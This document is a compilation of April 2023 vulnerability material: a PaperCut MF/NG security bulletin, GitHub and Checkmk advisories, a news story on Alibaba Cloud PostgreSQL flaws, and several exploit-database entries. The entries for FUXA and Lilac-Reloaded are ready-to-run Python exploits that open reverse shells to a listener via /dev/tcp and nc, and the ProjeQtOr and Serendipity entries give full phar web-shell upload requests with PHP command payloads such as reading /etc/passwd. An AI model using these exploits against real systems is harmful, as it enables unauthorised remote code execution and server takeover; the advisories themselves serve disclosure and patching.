This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.

We have received two vulnerability reports from a 3rd party cyber security company (Trend Micro), for high/critical severity security issues in PaperCut MF/NG. **We have evidence to suggest that unpatched servers are being exploited in the wild.**

As a precaution, we are not able to reveal too much about these vulnerabilities. We have documented what we can disclose below.

**Critical:** Please note that as of 18th April, 2023 we have evidence to suggest that unpatched servers are being exploited in the wild, (particularly ZDI-CAN-18987 / PO-1216).

Our immediate advice is to upgrade your PaperCut Application Servers to one of the fixed versions listed below if you haven’t already.

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior. We have also updated the FAQ “How do I know if my server has been exploited?” question below.

**Important:** Both of these vulnerabilities have been **fixed** in PaperCut MF and PaperCut NG versions **20.1.7, 21.2.11 and 22.0.9** and later. We highly recommend upgrading to one of these versions containing the fix (see the Where can I get the upgrade? question below).

**ZDI-CAN-18987 / PO-1216**

_(also identified as CVE-2023–27350)_

We have confirmed that under certain circumstances this allows for an unauthenticated attacker to get Remote Code Execution (RCE) on a PaperCut Application Server. This could be done remotely and without the need to log in.

_This vulnerability has been rated with a CVSS score of 9.8._

**ZDI-CAN-19226 / PO-1219**

_(also identified as CVE-2023–27351)_

We have confirmed that under certain circumstances this allows for an unauthenticated attacker to potentially pull information about a user stored within PaperCut MF or NG - including usernames, full names, email addresses, office/department info and any card numbers associated with the user. The attacker can also retrieve the hashed passwords for **internal** PaperCut\-created users only (note that this does **not** include any password hashes for users sync’d from directory sources such as Microsoft 365 / Google Workspace / Active Directory and others). This could be done remotely and without the need to log in. We do not have any evidence of this vulnerability being used against customers at this point.

_This vulnerability has been rated with a CVSS score of 8.2._

**Product status and next steps**

Which PaperCut products are impacted, and what are the actions required?

 

**ZDI-CAN-18987 / PO-1216**  
_CVE-2023–27350_

**ZDI-CAN-19226 / PO-1219**  
_CVE-2023–27351_

**What versions are impacted?**

PaperCut MF or NG version 8.0 or later, on all OS platforms

PaperCut MF or NG version 15.0 or later, on all OS platforms

**Which PaperCut MF or NG components are impacted?**

Application Servers **are** impacted  
Site Servers **are** impacted

Application Servers **are** impacted

**Which PaperCut components or products are _NOT_ impacted?**

PaperCut MF/NG secondary servers (Print Providers).  
PaperCut MF/NG Direct Print Monitors (Print Providers).  
PaperCut Hive.  
PaperCut Pocket.  
Print Deploy.  
Mobility Print.  
PaperCut User Client software.

PaperCut MF/NG secondary servers (Print Providers).  
PaperCut MF/NG Direct Print Monitors (Print Providers).  
PaperCut MF/NG site servers.  
PaperCut Hive.  
PaperCut Pocket.  
Print Deploy.  
Mobility Print.  
PaperCut User Client software.

**Next steps**

We recommend that you upgrade all Application Servers and Site Servers (see Upgrade documentation)

You will **not** need to patch Secondary Servers (Print Providers / Direct Print Monitors) - but you can if you prefer.

We recommend that you upgrade all Application Servers and Site Servers (see Upgrade documentation). Even though the Site Server is not impacted by this vulnerability, you will need to upgrade them to match the version number of the Application Server.

You will **not** need to patch Secondary Servers (Print Providers / Direct Print Monitors) - but you can if you prefer.

**FAQs**

Q Where can I get the upgrade?

Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.

If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

Q Is there any impact from applying the upgrade?

There should be no negative impact from applying these security fixes. No other manual steps need to be taken.

Q Where are the release notes for these fixes?

You can see the release notes pages for PaperCut MF and NG which list all fixes included per version:

*   MF - 20.1.7, 21.2.11, 22.0.9
*   NG - 20.1.7, 21.2.11, 22.0.9

Q What are the CVSS scores for these vulnerabilities?

Vulnerability: ZDI-CAN-18987 / PO-1216

*   Score: 9.8 (Critical)
*   Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability: ZDI-CAN-19226 / PO-1219

*   Score: 8.2 (High)
*   Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Q Is there more information available about these vulnerabilities?

Not at this time - to give customers a chance to upgrade, we are not releasing further details about these vulnerabilities.

Trend Micro have also advised they will disclose further information (TBD) about the vulnerability on 10th May 2023. For more information, see https://www.zerodayinitiative.com/advisories/upcoming/ (filter on “PaperCut”).

Q Is there a mitigation for these vulnerabilities if I don’t want to upgrade?

ZDI-CAN-18987 / PO-1216:

*   No practical pre-patch mitigation strategy has been identified. Customers will need to patch to address the issue.

ZDI-CAN-19226 / PO-1219:

*   Apply “Allow list” restrictions under **Options > Advanced > Security > Allowed site server IP addresses**. Set this to only allow the IP addresses of verified Site Servers on your network.

Q How do I know if my server has been exploited?

There is not currently a 100% solid way to tell if your server(s) have been exploited.

We recommend a review of server access logs and virus and malware scanner results. From a PaperCut point of view we also recommend:

*   Look for suspicious activity in **Logs > Application Log**, within the PaperCut admin interface.
*   Keep an eye out in particular for any updates from a user called [setup wizard].
*   Look for new (suspicious) users being created, or other configuration keys being tampered with.
*   Look for any suspicious processes being run on the Application Server - particularly processes owned by pc-app.exe.
*   If your Application Server server logs happen to be in debug mode, check to see if there are lines mentioning SetupCompleted at a time not correlating with the server installation or upgrade. Server logs can be found e.g. in [app-path]/server/logs/*.* where server.log is normally the most recent log file.

However, these are only examples of suspicious activity - if an attacker does gain access through an unpatched vulnerability, they may also work to cover their steps.

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior.

Q Is there a maintenance release for versions 19 or older?

No - versions 19 and older are now “end of life”, as documented on our End of Life Policy page.

We recommend purchasing an updated license, which you can do online if you’re using PaperCut NG, or through your PaperCut Partner if you’re using PaperCut MF. You can find your PaperCut Partner contact information through the ‘About’ or ‘Help’ tab in the PaperCut administration interface.

Q I have a version 20 license, but no current M&S (maintenance and support) - can I still get this fix?

Yes! As long as you are running a version which is currently supported (version 20 or later) you can upgrade to whichever maintenance release version you’re licensed for. For example if you are licensed for version 20 but you don’t have a valid license for version 21, you can update to version 20.1.7 as above. See the ‘Where can I get the upgrade?’ question above for more details.

See our Upgrade Policy page for more information on licensing and upgrades.

**Acknowledgements**

PaperCut would like to thank the researchers working with Trend Micro for reporting these issues and working with us to help protect our customers:

*   ZDI-CAN-19226 - Discovered by: Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative
*   ZDI-CAN-18987 - Discovered by: Anonymous

Trend Micro have also advised they will disclose further information (TBD) about the vulnerability on 10th May 2023. For more information, see https://www.zerodayinitiative.com/advisories/published/ (filter on “PaperCut”).

**Security Updates**

In order to get notifications of security fixes please subscribe to our security notifications list via our sign up form.

**Updates**

**Date**

**Update/Action**

10th January 2023

Vulnerability reported to PaperCut, by Trend Micro (see ZDI-CAN-18987 and ZDI-CAN-19226).

8th March 2023

Released PaperCut MF and NG versions 20.1.7, 21.2.11 and 22.0.9 containing a fix for these vulnerabilities.  
Published this KB article documenting the vulnerability information.  
Sent communications to PaperCut partners and PaperCut security notifications email list.

14th March 2023

Trend Micro published additional details of the vulnerability on their website: ZDI-CAN-18987 and ZDI-CAN-19226.

19th April 2023

Updated this KB with new information discovered on the 18th April - indicating evidence to suggest that unpatched servers are being exploited in the wild.

_Categories:_ FAQ, Security and Privacy

_Keywords:_

CVE-2023-27351: APRIL 19 UPDATE | PaperCut MF/NG vulnerability bulletin (March 2023)

FUXA version 1.1.13-1186 suffers from an unauthenticated remote code execution vulnerability.

    # Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)# Date: 18/04/2023# Exploit Author: Rodolfo Mariano# Vendor Homepage: https://github.com/frangoteam/FUXA# Version: FUXA V.1.1.13-1186 (current)from argparse import RawTextHelpFormatterimport argparse, sys, threading, requestsdef main(rhost, rport, lhost, lport):    url = "http://"+rhost+":"+rport+"/api/runscript"    payload = {        "headers":            {                "normalizedNames":{},                "lazyUpdate": "null"            },            "params":{                "script":{                    "parameters":[                    {                    "name":"ok",                    "type":"tagid",                    "value":""                    }                    ],                    "mode":"",                    "id":"",                    "test":"true",                    "name":"ok",                    "outputId":"",                    "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)                }            }        }    response = requests.post(url, json=payload)args = Noneparser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')args=parser.parse_args()main(args.rhost, args.rport, args.lhost, args.lport)

FUXA 1.1.13-1186 Remote Code Execution

ProjeQtOr Project Management System version 10.3.2 suffers from a remote shell upload vulnerability.

Exploit Title: ProjeQtOr Project Management System 10.3.2   -Remote Code Execution (RCE)  
Application: ProjeQtOr Project Management System  
Version: 10.3.2  
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://www.projeqtor.org  
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download  
Date of found: 19.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again

Payload:<?php echo system("id"); ?>

poc request:

POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1  
Host: localhost  
Content-Length: 1177  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: application/json  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/projeqtor/view/main.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic  
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"  
Content-Type: application/octet-stream

<?php echo system("id"); ?>

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentId"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefType"

User  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefId"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentType"

file  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentLink"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentDescription"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentPrivacy"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="uploadType"

html5  
------WebKitFormBoundaryY0bpJaQzcvQberWR--

visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

ProjeQtOr Project Management System 10.3.2 Shell Upload

Lilac-Reloaded for Nagios version 2.0.l8 remote code execution exploit.

    #!/usr/bin/env python"""# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)# Google Dork: N/A# Date: 2023-04-13# Exploit Author: max / Zoltan Padanyi# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download# Version: 2.0.8# Tested on: Debian 7.6# CVE : N/AThe autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;Use at your own risk!RCA - wild exec is ongoing without any filteringin library/Net/Traceroute.php   181      function _setTraceroutePath($sysname)   182      {   183          $status    = '';   184          $output    = array();   185          $traceroute_path = '';   186   187          if ("windows" == $sysname) {   188              return "tracert";   189          } else {   190              $traceroute_path = exec("which traceroute", $output, $status);   [...]   257      function traceroute($host)   258      {   259   260          $argList = $this->_createArgList();   261          $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];   262          exec($cmd, $this->_result);"""import requestsimport argparseparser = argparse.ArgumentParser()parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)parser.add_argument("-i", "--ip", help="Listener IP", required=True)parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)args = parser.parse_args()rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}try:    r = requests.get(args.url)    if r.ok:      print("[+] URL looks good...moving forward...")      print("[+] Sending exploit in...")      r = requests.post(args.url,data=body)      if r.ok:        print("[+] Got HTTP 200, check your listener!")    else:      print("[-] Some kind of error happened, check the http response below!")      print(r.text)except Exception as e:  print("General exception: " + str(e))

Lilac-Reloaded For Nagios 2.0.8 Remote Code Execution

Serendipity version 2.4.0 suffers from a remote shell upload vulnerability.

Exploit Title: Serendipity 2.4.0  - Remote Code Execution (RCE) (Authenticated)  
Application: Serendipity   
Version:  2.4.0   
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://docs.s9y.org/  
Software Link: https://docs.s9y.org/downloads.html  
Date of found: 13.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.  
<?php echo system("cat /etc/passwd"); ?>  
 I wrote a file with the above payload, a poc.phar extension, and uploaded it.

Visit to http://localhost/serendipity/uploads/poc.phar

poc request:

POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1  
Host: localhost  
Content-Length: 1561  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: iframe  
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b  
Connection: close

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[token]"

ae9b8ae35a756c24f9552a021ee81d56  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[action]"

admin  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[adminModule]"

media  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[adminAction]"

add  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd");?>

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_filename][1]"

poc.phar  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_directory][1]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[column_count][1]"

true  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[imageurl]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[imageimporttype]"

image  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_filename][]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_directory][]"

------WebKitFormBoundaryZWKPiba66PSVGQzc--

poc video :  https://youtu.be/_VrrKOTywgo

Serendipity 2.4.0 Shell Upload

PowerJob V4.3.2 has unauthorized interface that causes remote code execution.

**PowerJob vulnerable to remote code execution**

High severity GitHub Reviewed Published Apr 20, 2023 to the GitHub Advisory Database • Updated Apr 20, 2023

GHSA-9mh9-44q3-v79x: PowerJob vulnerable to remote code execution

CVE-2023-29926

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context.

### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.

### Patches
This vulnerability was patched in the release of version `3.9.17` of `vm2`.

### Workarounds
None.

### References
PoC - https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244

### For more information

If you have any questions or comments about this advisory:

- Open an issue in [VM2](https://github.com/patriksimek/vm2)

Thanks to [Xion](https://twitter.com/0x10n) (SeungHyun Lee) of [KAIST Hacking Lab](https://kaist-hacking.github.io/) for disclosing this vulnerability.

**Package**

npm vm2 (npm)

**Affected versions**

< 3.9.17

**Patched versions**

3.9.17

**Description**

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.

**Impact**

A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.

**Patches**

This vulnerability was patched in the release of version 3.9.17 of vm2.

**Workarounds**

None.

**References**

PoC - https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in VM2

Thanks to Xion (SeungHyun Lee) of KAIST Hacking Lab for disclosing this vulnerability.

**References**

*   GHSA-ch3r-j5x3-6q2m
*   https://nvd.nist.gov/vuln/detail/CVE-2023-30547
*   patriksimek/vm2@4b22e87
*   patriksimek/vm2@f3db4de
*   https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
*   https://github.com/patriksimek/vm2/releases/tag/3.9.17

 patriksimek published to patriksimek/vm2

Apr 17, 2023

Published to the GitHub Advisory Database

Apr 20, 2023

Reviewed

Apr 20, 2023

GHSA-ch3r-j5x3-6q2m: vm2 Sandbox Escape vulnerability

Broad access controls could allow site users to directly interact with the system Apache installation when providing the reverse proxy configurations for Tribe29's Checkmk <= 2.1.0p6, Checkmk <= 2.0.0p27, and all versions of Checkmk 1.6.0 (EOL) allowing an attacker to perform remote code execution with root privileges on the underlying host.

Component

Site management

Title

Fix local privilege escalation from site users

Date

Jun 1, 2022

Checkmk Edition

Checkmk Raw (CRE)

Checkmk Version

2.2.0b1 2.1.0p7 2.0.0p28

Level

Trivial Change

Class

Security Fix

Compatibility

Compatible - no manual interaction needed

Each Checkmk site provides it's HTTP services (UI, APIs) using it's own site Apache process. Global access to this site Apache is provided via the system Apache which is opening the 80 and 443 ports for external requests, depending on your system configuration.

To learn about the site Apache, the system Apache reads a reverse proxy configuration provided by the site user. This could be used by a site user to make the system Apache execute code as root user, since the System Apache is typically started initially with root privileges.

To close this gap, we now need to separate the system Apache configuration from the site user access.

To eliminate the privilege escalation, you will have to execute the command omd update-apache-config \[SITE\] once for each of your sites after the omd update command.

Besides the one-time fix, this change has a consequence for the use of omd config and omd update. There are two situations where this is relevant:

a) If you change the options APACHE\_TCP\_ADDR, APACHE\_TCP\_PORT or APACHE\_MODE

You will have to call omd update-apache-config \[SITE\] as root user after changing one of the site configuration options APACHE\_TCP\_ADDR, APACHE\_TCP\_PORT or APACHE\_MODE. This needs to be done to update and apply the system Apache configuration. If you don't do this and start your site, your UI may be not available anymore.

The omd config command will output a warning to notify you about this necessary step in the future.

b) If you execute omd update and the proxy configuration changes

The update is performed as site user. Which means that, after this werk, we can not update and apply the system apache configuration anymore automatically.

To apply the latest apache configuration, the command omd update-apache-config \[SITE\] needs to be executed after the update.

The omd update will automatically detect the need for this additional step and show you a confirmation dialog before starting the update to notify you about this necessary step and giving you the chance to interrupt the procedure in case you don't have the option to execute the command as root user.

All maintained versions (>=1.6) are subject to this vulnerability. It is likely that also previous versions were vulnerable. Users of previous versions are highly recommended to update or consider other mitigations.

If you want to solve this issue for a site that is using an unpatched version, you can do it by replacing the file /omd/apache/\[SITE\].conf with a file like follows. Please note, that you will have to replace all occurrences \[SITE\] with the ID of your site and \[PORT\] with the port of the site apache. After you replaced the file, you will have to restart the system Apache.

    # version: 0
    
    # Make sure that symlink /omd does not make problems
    <Directory />
    Options +FollowSymlinks
    </Directory>
    
    <IfModule mod_proxy_http.c>
    ProxyRequests Off
    ProxyPreserveHost On
    
    <Proxy http://127.0.0.1:[PORT]/[SITE]>
    Order allow,deny
    allow from all
    </Proxy>
    
    <Location /[SITE]>
    # Setting "retry=0" to prevent 60 second caching of problem states e.g. when
    # the site apache is down and someone tries to access the page.
    # "disablereuse=On" prevents the apache from keeping the connection which leads to
    # wrong devlivered pages sometimes
    ProxyPass http://127.0.0.1:[PORT]/[SITE] retry=0 disablereuse=On timeout=120
    ProxyPassReverse http://127.0.0.1:[PORT]/[SITE]
    </Location>
    </IfModule>
    
    <IfModule !mod_proxy_http.c>
    Alias /[SITE] /omd/sites/[SITE]
    <Directory /omd/sites/[SITE]>
    Deny from all
    ErrorDocument 403 "<h1>Checkmk: Incomplete Apache Installation</h1>You need mod_proxy and
    mod_proxy_http in order to run the web interface of Checkmk."
    </Directory>
    </IfModule>
    
    <Location /[SITE]>
    ErrorDocument 503 "<meta http-equiv='refresh' content='60'><h1>Checkmk: Site Not Started</h1>You need to start this site in order to access the web interface."
    </Location>
    

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 8.8 (https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

We assigned CVE-2022-46302 to this vulnerability.

We thank Jan-Philipp Litza (PLUTEX GmbH) for reporting this issue!

To the list of all Werks

CVE-2022-46302: Fix local privilege escalation from site users

A chain of two critical flaws has been disclosed in Alibaba Cloud's ApsaraDB RDS for PostgreSQL and AnalyticDB for PostgreSQL that could be exploited to breach tenant isolation protections and access sensitive data belonging to other customers.
"The vulnerabilities potentially allowed unauthorized access to Alibaba Cloud customers' PostgreSQL databases and the ability to perform a supply chain

Cloud Security / Vulnerability

A chain of two critical flaws has been disclosed in Alibaba Cloud's ApsaraDB RDS for PostgreSQL and AnalyticDB for PostgreSQL that could be exploited to breach tenant isolation protections and access sensitive data belonging to other customers.

"The vulnerabilities potentially allowed unauthorized access to Alibaba Cloud customers' PostgreSQL databases and the ability to perform a supply chain attack on both Alibaba database services, leading to an RCE on Alibaba database services," cloud security firm Wiz said in a new report shared with The Hacker News.

The issues, dubbed **BrokenSesame**, were reported to Alibaba Cloud in December 2022, following mitigations were deployed by the company on April 12, 2023. There is no evidence to suggest that the weaknesses were exploited in the wild.

In a nutshell, the vulnerabilities – a privilege escalation flaw in AnalyticDB and a remote code execution bug in ApsaraDB RDS – made it possible to elevate privileges to root within the container, escape to the underlying Kubernetes node, and ultimately obtain unauthorized access to the API server.

Armed with this capability, an attacker could retrieve credentials associated with the container registry from the API server and push a malicious image to gain control of customer databases belonging to other tenants on the shared node.

"The credentials used to pull images were not scoped correctly and allowed push permissions, laying the foundation for a supply-chain attack," Wiz researchers Ronen Shustin and Shir Tamari said.

This is not the first time PostgreSQL vulnerabilities have been identified in cloud services. Last year, Wiz uncovered similar issues in Azure Database for PostgreSQL Flexible Server (ExtraReplica) and IBM Cloud Databases for PostgreSQL (Hell's Keychain).

UPCOMING WEBINAR

Defend with Deception: Advancing Zero Trust Security

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The findings come as Palo Alto Networks Unit 42, in its Cloud Threat Report, revealed that "threat actors have become adept at exploiting common, everyday issues in the cloud," including misconfigurations, weak credentials, lack of authentication, unpatched vulnerabilities and malicious open source software (OSS) packages.

"76% of organizations don't enforce MFA \[multi-factor authentication\] for console users, while 58% of organizations don't enforce MFA for root/admin users," the cybersecurity firm said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#rce